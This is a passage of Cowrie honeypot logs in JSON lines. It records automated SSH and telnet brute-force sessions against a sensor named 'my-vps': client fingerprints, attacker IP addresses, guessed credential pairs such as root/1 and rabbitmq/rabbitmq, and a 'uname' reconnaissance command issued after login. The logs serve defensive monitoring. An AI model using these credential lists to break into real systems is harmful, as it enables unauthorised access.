m@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:26:39.449721Z","src_ip":"41.226.27.251","session":"c5a31258e5b5"}
{"eventid":"cowrie.login.failed","username":"rabbitmq","password":"rabbitmq","message":"login attempt [rabbitmq/rabbitmq] failed","sensor":"my-vps","timestamp":"2025-08-31T03:26:39.630967Z","src_ip":"41.226.27.251","session":"c5a31258e5b5"}
{"eventid":"cowrie.session.closed","duration":"80.4","message":"Connection lost after 80.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:40.251336Z","src_ip":"212.227.125.160","session":"004559879d89"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:40.935783Z","src_ip":"41.226.27.251","session":"c5a31258e5b5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36174,"dst_ip":"1.2.3.4","dst_port":22,"session":"564e18197581","protocol":"ssh","message":"New connection: 212.227.125.160:36174 (1.2.3.4:22) [session: 564e18197581]","sensor":"my-vps","timestamp":"2025-08-31T03:26:52.584540Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:26:56.158986Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:26:56.160110Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":36494,"dst_ip":"1.2.3.4","dst_port":22,"session":"ee1386573a72","protocol":"ssh","message":"New connection: 41.226.27.251:36494 (1.2.3.4:22) [session: ee1386573a72]","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.619784Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.620804Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.664691Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.login.success","username":"root","password":"aa123456","message":"login attempt [root/aa123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.798540Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:26:59.903056Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.903983Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.949577Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:26:59.950872Z","src_ip":"41.226.27.251","session":"ee1386573a72"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":34544,"dst_ip":"1.2.3.4","dst_port":22,"session":"02c66862fd99","protocol":"ssh","message":"New connection: 212.227.235.229:34544 (1.2.3.4:22) [session: 02c66862fd99]","sensor":"my-vps","timestamp":"2025-08-31T03:27:06.396961Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:27:07.211874Z","src_ip":"212.227.235.229","session":"02c66862fd99"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:27:07.212537Z","src_ip":"212.227.235.229","session":"02c66862fd99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":55194,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d870c0bdeb7","protocol":"ssh","message":"New connection: 212.227.125.160:55194 (1.2.3.4:22) [session: 6d870c0bdeb7]","sensor":"my-vps","timestamp":"2025-08-31T03:27:11.948559Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:27:11.949595Z","src_ip":"212.227.125.160","session":"6d870c0bdeb7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T03:27:12.209565Z","src_ip":"212.227.125.160","session":"6d870c0bdeb7"}
{"eventid":"cowrie.login.success","username":"root","password":"1","message":"login attempt [root/1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:27:12.713497Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password","message":"login attempt [guest/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:27:12.768332Z","src_ip":"212.227.235.229","session":"02c66862fd99"}
{"eventid":"cowrie.login.failed","username":"oracle","password":"123456Aa?","message":"login attempt [oracle/123456Aa?] failed","sensor":"my-vps","timestamp":"2025-08-31T03:27:13.245703Z","src_ip":"212.227.125.160","session":"6d870c0bdeb7"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:14.506022Z","src_ip":"212.227.125.160","session":"6d870c0bdeb7"}
{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:14.612730Z","src_ip":"212.227.235.229","session":"02c66862fd99"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":41995,"dst_ip":"1.2.3.4","dst_port":23,"session":"2a63d695eb6e","protocol":"telnet","message":"New connection: 212.227.125.160:41995 (1.2.3.4:23) [session: 2a63d695eb6e]","sensor":"my-vps","timestamp":"2025-08-31T03:27:15.283672Z"}
{"eventid":"cowrie.session.closed","duration":0.0012047290802001953,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:15.284797Z","src_ip":"212.227.125.160","session":"2a63d695eb6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42000,"dst_ip":"1.2.3.4","dst_port":23,"session":"4d486a4f7061","protocol":"telnet","message":"New connection: 212.227.125.160:42000 (1.2.3.4:23) [session: 4d486a4f7061]","sensor":"my-vps","timestamp":"2025-08-31T03:27:15.525475Z"}
{"eventid":"cowrie.login.failed","username":"super","password":"adminpass","message":"login attempt [super/adminpass] failed","sensor":"my-vps","timestamp":"2025-08-31T03:27:16.471750Z","src_ip":"212.227.125.160","session":"4d486a4f7061"}
{"eventid":"cowrie.session.closed","duration":1.1699097156524658,"message":"Connection lost after 1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:16.695304Z","src_ip":"212.227.125.160","session":"4d486a4f7061"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":42015,"dst_ip":"1.2.3.4","dst_port":23,"session":"f04d78050703","protocol":"telnet","message":"New connection: 212.227.125.160:42015 (1.2.3.4:23) [session: f04d78050703]","sensor":"my-vps","timestamp":"2025-08-31T03:27:16.889451Z"}
{"eventid":"cowrie.session.closed","duration":0.26790666580200195,"message":"Connection lost after 0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:17.157295Z","src_ip":"212.227.125.160","session":"f04d78050703"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:27:17.745493Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:27:17.746275Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47880,"dst_ip":"1.2.3.4","dst_port":22,"session":"9a8398572f74","protocol":"ssh","message":"New connection: 212.227.235.229:47880 (1.2.3.4:22) [session: 9a8398572f74]","sensor":"my-vps","timestamp":"2025-08-31T03:27:18.148861Z"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":60440,"dst_ip":"1.2.3.4","dst_port":22,"session":"e856023d6a16","protocol":"ssh","message":"New connection: 41.226.27.251:60440 (1.2.3.4:22) [session: e856023d6a16]","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.586592Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.652296Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.653304Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.login.success","username":"root","password":"1q2w3e4r","message":"login attempt [root/1q2w3e4r] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.836754Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:27:19.942574Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.943311Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.989005Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:19.990317Z","src_ip":"41.226.27.251","session":"e856023d6a16"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"5.9","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 5.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:23.657446Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.session.closed","duration":"31.1","message":"Connection lost after 31.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:23.658559Z","src_ip":"212.227.125.160","session":"564e18197581"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:27:23.854042Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:27:23.894741Z","src_ip":"212.227.235.229","session":"9a8398572f74"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52988,"dst_ip":"1.2.3.4","dst_port":22,"session":"31e8715d1483","protocol":"ssh","message":"New connection: 212.227.125.160:52988 (1.2.3.4:22) [session: 31e8715d1483]","sensor":"my-vps","timestamp":"2025-08-31T03:27:27.656339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:27:28.134787Z","src_ip":"212.227.125.160","session":"31e8715d1483"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T03:27:28.135537Z","src_ip":"212.227.125.160","session":"31e8715d1483"}
{"eventid":"cowrie.login.failed","username":"guest","password":"password","message":"login attempt [guest/password] failed","sensor":"my-vps","timestamp":"2025-08-31T03:27:30.180462Z","src_ip":"212.227.125.160","session":"31e8715d1483"}
{"eventid":"cowrie.session.closed","duration":"4.0","message":"Connection lost after 4.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:27:31.701793Z","src_ip":"212.227.125.160","session":"31e8715d1483"}
{"eventid":"cowrie.session.connect","src_ip":"41.226.27.251","src_port":44274,"dst_ip":"1.2.3.4","dst_port":22,"session":"64859a53e096","protocol":"ssh","message":"New connection: 41.226.27.251:44274 (1.2.3.4:22) [session: 64859a53e096]","sensor":"my-vps","timestamp":"2025-08-31T03:27:39.792250Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:27:39.793011Z","src_ip":"41.226.27.251","session":"64859a53e096"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:27:39.840938Z","src_ip":"41.226.27.251","session":"64859a53e096"}
{"eventid":"cowrie.login.success","username":"root","password":"root@123","message":"login attempt [root/root@123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:27:39.985667Z","src_ip":"41.226.27.251","session":"64859a53e096"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T03:27:40.569457Z","src_ip":"41.226.27.251","session":"64859a53e096"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T03:27:40.570222Z","src_ip":"41.226.27.251","session":"64859a53e096"}
